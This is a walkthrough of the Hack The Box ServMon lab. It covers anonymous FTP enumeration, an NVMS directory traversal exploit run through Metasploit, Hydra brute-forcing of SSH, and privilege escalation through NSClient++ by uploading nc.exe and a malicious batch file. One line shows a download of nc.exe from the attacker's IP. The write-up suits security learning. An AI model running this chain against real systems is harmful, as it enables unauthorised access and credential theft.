ServMon

Difficulty: easy (3.7/10)

Type: CTF

OS: Windows

desc

Lab configuration

First, download VirtualBox and Kali (or Parrot). When the machine is imported in VirtualBox, chose bridged adapter in the Network tab to have access to the internet. Start and set up the machine as you like.

ServMon is a retired box of Hack The Box, and it is necessary to get a VIP access in order to do it (10$/month). Then, it’s super easy and convenient to connect to it. The first thing to do is to download the connection pack at https://www.hackthebox.eu/home/htb/access. Then, open a terminal (make sure you’re in the same directory as your connection file (yourname.ovpn)) and type the following command:

openvpn yourname.ovpn

Where yourname is your username on Hack The Box. If you’re using Kali 2020, make sure to add sudo to the previous command.

When this is done, just look at the IP of the machine on HTB (Hack the Box). ServMon is given the IP 10.10.10.184.
We’re ready to start !

1. Scan the ports of the target

Let’s start by performing the usual nmap scan with the flags -sV to have a verbose output and -sC to enable the most common scripts scan.

nmap

nmap

There are many opened ports, but we quickly see interesting information: anonymous FTP is allowed, so we will be able to connect to the target and search for potentiel files.
There are a few common ports and services, among which 2 were also opened in the other Windows machines:

There are also a few ports I have never seen so far:

It looks like we have a lot of possibilities! However, I don’t think we could go anywhere with SSH at this point. I will start by looking at FTP and HTTP, but I suspect we will have to exploit SMB on port 445… However, I don’t want to start Metasploit two minutes after starting this box… There are many things to explore, so let’s go through them and learn some stuff! We will also search Exploit-DB for any exploit for Nagios, NRPE and Napster.

Let’s go!

2. Find and exploit vulnerabilities

FTP

As we saw in the result of the nmap scan, anonymous login is allowed, so let’s see if we can find interesting files:

ftp

Note that I just pressed enter when I was asked for the password. Once loged in, we see the folder Users, and within it, the two users Nadine and Nathan. Great, we already have two usernames. Let’s look into those folders:

ftp

Nadine has a Confidential.txt file that can be downloaded on our Kali machine with the command get. The file will be saved in the folder in which we launched FTP. Let’s also see if Nathan has interesting files:

ftp

He has a “Notes to do.txt” file, which we download the same way we did for the previous one. Now, let’s look at what they contain.

file content

In Nadine’s note, we see that she left the Passwords.txt file on Nathan’s Desktop. This might be interesting if we can access it at some point.
In Nathan’s note, there is a todo list showing that he still hasn’t uploaded the passwords, removed public access to NVMS and placed the secret files in SharePoint.

I don’t know what NVMS and SharePoint are, so let’s search on the internet. NVMS could be Latitude NVMS, a network based video management software platform that allows for streamlined provisioning of client software with automatic updates.

Microsoft SharePoint allows the creation of websites and to stock, organize and share information. It only requires a web browser.

Let’s keep this iformation in mind, but not focus on it at the moment. We already have interesting information, so let’s move to another port!

SSH

We found two usernames with FTP, and it’s worth trying to SSH with them. Unfortunately, I couln’t get in this way (I tried a few passwords such as admin, Nadine, Nathan, 1234, etc…)

HTTP

We saw there is a web server running, so let’s check what’s there!

web server

Well, it looks like NVMS is the platform we talked about earlier. In the todo list, Nathan mentionned to remove NVMS public access. I checked on the internet for public credentials but didn’t find anything.
I also tried different combinations of usernames and passwords, to no avail. Anyways, I don’t know if having access to this platform would help us… Let’s use dirbuster to see if there is any other interesting page. If it is not the case, we might try to bruteforce the password for Nathan or Nadine.

dirb

Dirbuster found 2 pages, but nothing interesting… One is just for an icon, and the other one redirects us on the NVMS login screen. It didn’t find /Pages though, because it is not in the common.txt wordlist. Let’s run another dirbuster against 10.10.10.184/Pages then. Once again, it didn’t find anything. To bruteforce a password, we would need to know the type of request being sent to the server. I used Burpsuite to intercept the request and look at its parameters:

burp

We see the POST request, however, it says that the connection is closed and the only parameter is the cookie… Maybe this is related to the public access to NVMS removal, and we can’t access it anymore ?

Let’s look for any NVMS exploit.

searchsploit nvms

There is only one exploit for NVMS, and it’s a directory traversal attack. We can look at the exploit on exploit-db (https://www.exploit-db.com/exploits/47774). We see that if we sent a GET request to the server, it should answer with:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1\

So, let’s launch Metasploit with the command msfconsole, and use the exploit. The options are the following:

exploit options

Here, I set RHOSTS as 10.10.10.184, which is the IP of the target. We see that FILEPATH is set by default to /windows/win.ini, which is what was given in the description. Hence, we should get the expected response. Let’s launch the exploit and see.

exploit launch

The exploit worked and saved a file in /home/kali/.msf4/loot/. We go there and inspect it:

Directoy trav answer

Great, we get the answer we expected. So, now we want to customize the request to get another file. We saw in Nadine’s note that she left the Passwords.txt file on Nathan’s Desktop, and that’s what we’re going to grab. We modify the request:

modified request

And we see that a file got saved in the same directory as before. Let’s inspect it.

passwords

There are 7 passwords, among which one probably grants access to the server. Here, I copied those passwords, and pasted them in a file pass.txt I created on my Kali desktop with nano. I also created a file called users.txt, containing the users Nadine, nadine, Nathan and Nathan.

Creation of files

I did it to use those usernames and passwords as lists in Hydra to bruteforce credentials. The command is the following:

pw cracking with hydra

We see that both usernames nadine and Nadine work. Now that we’ve got the password, we can SSH:

nmap

Once in, we use the commands dir to list the content of directories, cd to change directory, and type to see the content of files. The user flag is on the desktop, so let’s get there.

user flag

That’s it for the user flag !

From there, we keep on enumerating to find something that would help us getting root. We see there’s a NSClient++ directory. Note that we saw this service in the initial nmap scan: it was on TCP port 8443 (service ssl/https-alt). It can be found here:

enumeration

more enumeration

NSClient is an agent designed originally to work with Nagios, but it’s now a monitoring agent that can be used with numerous monitoring tools. We saw in the scan that Nagios is using a plugin on port 5666. We can look in Exploit-DB if there is an exploit for NSClient:

search nsclient exploit

There is something, but after launching Metasploit with msfconsole and looking for the exploit with search nsclient, it doesn’t find it. We could add the exploit to Metasploit (as we did in OpenAdmin https://jsom1.github.io/_walkthroughs/OpenAdmin), but first, let’s look at the content of the file:

doc exploit1

doc exploit2

doc exploit3

We see that it would be useless to import it into Metasploit, because it’s not an exploit per se: it describes steps on how to exploit it. So, let’s go through them and get root!
The first step is to get a web administrator password:

Exploit step1

We see a plaintext password, as well as allowed hosts. Then, we have to login and enable some modules. However, if we look further in the previous file, we see the following information:

Exploit step1_2

The scripts are already enabled. We’re going to login anyway to check for the “enable at startup” option. We’re going to forward port: we listen on kali’s port 8443, and send a request to 127.0.0.1:8443.

Exploit step2

We should now be able to access NSClient from the browser:

Web gui authentication fail

The page is here but we can’t authenticate. This is because we saw in the allowed hosts that we have to request the page from 127.0.0.1 (localhost). I tried to replace 10.10.10.184 in the address but it didn’t work for some reason (error unable to connect). So, I looked at the API and saw we can authenticate from the terminal:

NSClient API

API authentication

We get a 200 code, meaning it worked. I don’t know why the web interface doesn’t work, so we will use the API and the terminal. Let’s look at the third point: we have to upload nc.exe and evil.bat from the attacking machine on the target in C:\Temp. We can use a curl command to do that. First, let’s find nc.exe, create evil.bat and regroup them on our desktop:

cp nc.exe

We create evil.bat with nano and copy the code given in the exploit’s documentation:

nano with exploit code

files on desktop

The 2 files are here and ready to be uploaded on the server. To do this, we start a web server on our Kali machine:

Start a web server

We can check that it works by navigating at our address (which can be seen with the command sudo ifconfig tun0):

Check web server

We can now use Powershell to transfer the files from Kali to SerMon (I tried to do it with curl http://10.10.14.14/nc.exe” -outfile “c:\temp\nc.exe”, but I got permission denied):

File transfer

We can see the files in C:\Temp, so we know the transfer worked.
The 4th step consists in setting up a listener on our Kali machine. We can use netcat to do that:

setup listener

In the 5th and 6th steps, we have to add a scheduler that calls the script every minute:

scheduler

At this point, we’re supposed to restart the machine. However, I checked my permissions and saw the following:

whoami

We’re nt authority\system. The last thing to do is navigate to the administrator’s desktop to grab the root flag:

root flag

That’s it !

My thoughts

That was a cool box, although I found the steps for getting root were badly explained. I spent a lot of time getting it to work. I particularly liked the way we get the user’s flag. It was also great to learn about NVMS and NSClient. I still don’t know why we couldn’t login via thw webpage, but I think it would have been easier if it worked.\